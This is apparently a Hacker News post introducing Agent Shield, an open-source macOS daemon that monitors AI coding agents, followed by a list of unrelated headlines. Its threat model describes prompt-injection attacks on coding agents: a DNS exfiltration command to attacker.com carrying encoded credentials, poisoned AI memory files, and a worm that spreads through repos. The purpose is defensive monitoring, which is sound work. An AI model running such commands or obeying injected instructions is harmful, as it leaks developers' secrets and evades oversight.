frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Open in hackernews

AI coding tools have broad filesystem and network access

1•shadag•1h ago
A few months ago I realized I had no idea what Claude Code was doing on my machine between keystrokes. I knew it had filesystem access. I knew it made network calls. But I had no visibility: which files it was reading, what subprocesses it was spawning, whether it had ever touched my .env or ~/.ssh. That bothered me enough that I built something to find out.

The result is Agent Shield — a background daemon that watches AI coding tools (Claude Code, Cursor, Cline, Copilot, Codex) at the OS level using macOS FSEvents, lsof, and subprocess tree polling. All event data stays in a local SQLite database.

Privacy note: If you set ANTHROPIC_API_KEY, the AI incident investigator activates and sends event context — process names, file paths, hostnames, and IP addresses — to the Claude API to generate incident reports. Nothing else leaves the machine. You can disable the AI analyst in Settings to run entirely on-device.

The threat model is concrete

Three attacks shaped the design:

CVE-2025-55284 — prompt injection causes Claude Code to run ping $(base64-encoded-credentials).attacker.com. Your API keys leave via DNS — invisible to any HTTPS-layer proxy watching your network traffic.

SpAIware (Windsurf, August 2025) — malicious content injected into AI memory files. Every future session silently exfiltrates data before doing any work. The injection point is a file, not a network request.

AgentHopper — AI reads a malicious repo, injects payloads into local source files, git pushes to spread, infects the next developer's AI agent. No single event looks alarming; the sequence is: file read → file write → git push.

That last one is why the cross-event correlation engine exists. The system stores a rolling event window per process and flags sequences. Each event alone is normal. The pattern is not.

Why not a network proxy

Every existing tool I looked at — CodeGate, Pipelock, and Sysdig's announcement this week — sits in the network path and inspects API calls. That architecture can't see file reads, subprocess spawning, or DNS exfiltration via ping. It can't monitor what the AI writes to its own memory directories, which is where SpAIware lives.

The attack surface isn't the API layer. It's the OS.

What's built

macOS FSEvents file watcher (real-time, no polling), subprocess tree monitoring, network classification Two-phase scanning: fast regex first, Claude API only on regex hits (keeps cost low) SpAIware detection — FSEvents watcher on AI memory directories (~/.claude/, ~/.cursor/, etc.) Cross-event sequence detection (cred read → unknown network → git push) MCP server allowlisting and discovery Policy enforcement: kill/suspend/block on confirmed threats (opt-in, monitor-only by default) Weekly threat intel refresh via a research agent (Exa + Claude) Web dashboard at localhost:6080, menu bar app Honest limitations

macOS only — FSEvents is Apple-specific. Python daemon, not a polished installer yet. Going open source (MIT) as part of this release.

Comments

shadag•1h ago
* Would love you input: https://github.com/shahar-dagan/agent-shield

Ask HN: AI companies' bots are making my server slow, what do you do?

1•aabbcc1241•1m ago•0 comments

Alibaba Unveils New Chip Design to Meet Surging Demand for AI

https://www.bloomberg.com/news/articles/2026-03-24/alibaba-unveils-new-chip-design-to-meet-surgin...
1•voxadam•4m ago•1 comments

Show HN: ArXiv metadata as Parquet files (2.99M papers, 1.44GB, 417 files)

https://huggingface.co/datasets/open-index/open-arxiv
1•tamnd•6m ago•0 comments

FCC Clearing the Air on Wi-Fi Software Updates (2015)

https://www.fcc.gov/news-events/blog/2015/11/12/clearing-air-wi-fi-software-updates
1•walterbell•10m ago•0 comments

Sovereign AI OS and SAMN Introduction

1•twocats7701•12m ago•0 comments

How Do US Men and Women Spend Their Time?

https://www.pewresearch.org/social-trends/feature/how-do-u-s-men-and-women-spend-their-time/
1•gmays•13m ago•0 comments

Firefox ext: Bkmker · Your bookmarks, encrypted and private

https://addons.mozilla.org/en-US/firefox/addon/bkmker/
2•fullstacking•19m ago•0 comments

OpenTarget Core: Laser Shooting Platform for Raspberry Pi Using OpenCV

https://github.com/JSK-Project/OpenTarget-Core
1•laurieg•21m ago•0 comments

Aspect Ratios with Sinners Director Ryan Coogler (2025)

https://www.youtube.com/watch?v=78Ru62uFM0s
1•hbcondo714•24m ago•0 comments

Halo-Gravity Traction

https://www.childrenshospital.org/conditions-treatments/halo-gravity-traction
1•walterbell•26m ago•0 comments

California bill aims to help vibe coders

https://www.semafor.com/article/03/20/2026/california-bill-aims-to-help-vibe-coders
2•gnabgib•27m ago•1 comments

A city that wasted nothing [video]

https://aeon.co/videos/the-extraordinary-efficiency-of-japans-edo-economy
4•billybuckwheat•29m ago•1 comments

Show HN: Locro – Fast and accurate local OCR through Chrome's screen_ai

https://github.com/sergiocorreia/clv-locro
1•zzleeper•29m ago•0 comments

'Microshifting' puts a new spin on 9-to-5 schedules

https://apnews.com/article/microshifting-work-time-flexible-schedule-balance-97a98519916b447cd60c...
1•donutshop•30m ago•0 comments

California bill to stop 'dominant platforms' from blocking competition

https://yro.slashdot.org/story/26/03/22/2025249/tech-leaders-support-california-bill-to-stop-domi...
4•MilnerRoute•30m ago•0 comments

Mars to Wars: New Space pivots to weaponize space

https://www.defensenews.com/space/2026/02/19/spacex-and-blue-origin-abruptly-shift-priorities-ami...
3•infinitewars•31m ago•1 comments

The Un-Slop Fiction Prize

https://www.hyperstitionai.com/unslop
1•Curiositry•34m ago•0 comments

Blackburn AI Bill Repeals Section 230, Expands AI Liability, Age Verification

https://reclaimthenet.org/trump-america-ai-act-section-230-repeal-ai-liability-age-verification
4•walterbell•36m ago•0 comments

Nashville library launches Memory Lab for digitizing home movies

https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies
3•toomuchtodo•37m ago•0 comments

Show HN: Generate, preview, and export 3D models without complex software

https://www.ai3dgen.com
2•stewardyunn•43m ago•0 comments

My Prodigal Brainchild

https://nealstephenson.substack.com/p/my-prodigal-brainchild
2•martinlaz•43m ago•0 comments

Show HN: A form builder that feels like chatting

https://www.typerson.com
1•briandev•46m ago•0 comments

Box of Secrets: Discreetly modding an apartment intercom with Matter

https://www.jackhogan.me/blog/box-of-secrets/
13•swq115•47m ago•1 comments

PwC will say goodbye to staff who aren't convinced about AI

https://www.theregister.com/2026/03/19/pwc_ai/
4•gnabgib•53m ago•1 comments

StackOverflow's questions per day have fallen 99%

https://meta.stackoverflow.com/questions/433864/do-you-agree-with-gergely-that-stack-overflow-is-...
12•stevage•55m ago•1 comments

Music manuscripts from Cologne now linked to digitized copies

https://rism.info/library_collections/2026/03/19/Music-manuscripts-from-Cologne.html
1•gnabgib•55m ago•0 comments

Where did 400 MiB go?

https://frn.sh/pmem/
3•thunderbong•56m ago•0 comments

Naomi Klein and Karen Hao: The Empire of AI and the Fight for Our Future [video]

https://www.youtube.com/watch?v=Z1B__Efqacc
1•ares623•56m ago•0 comments

The Equal Vote Coalition

https://www.equal.vote/
3•pabs3•59m ago•1 comments

App for comparing your kid's development

https://appstoreconnect.apple.com/login?targetUrl=%2Fapps%2F6757778539%2Fdistribution%2Fios%2Fver...
2•jbrozena22•1h ago•1 comments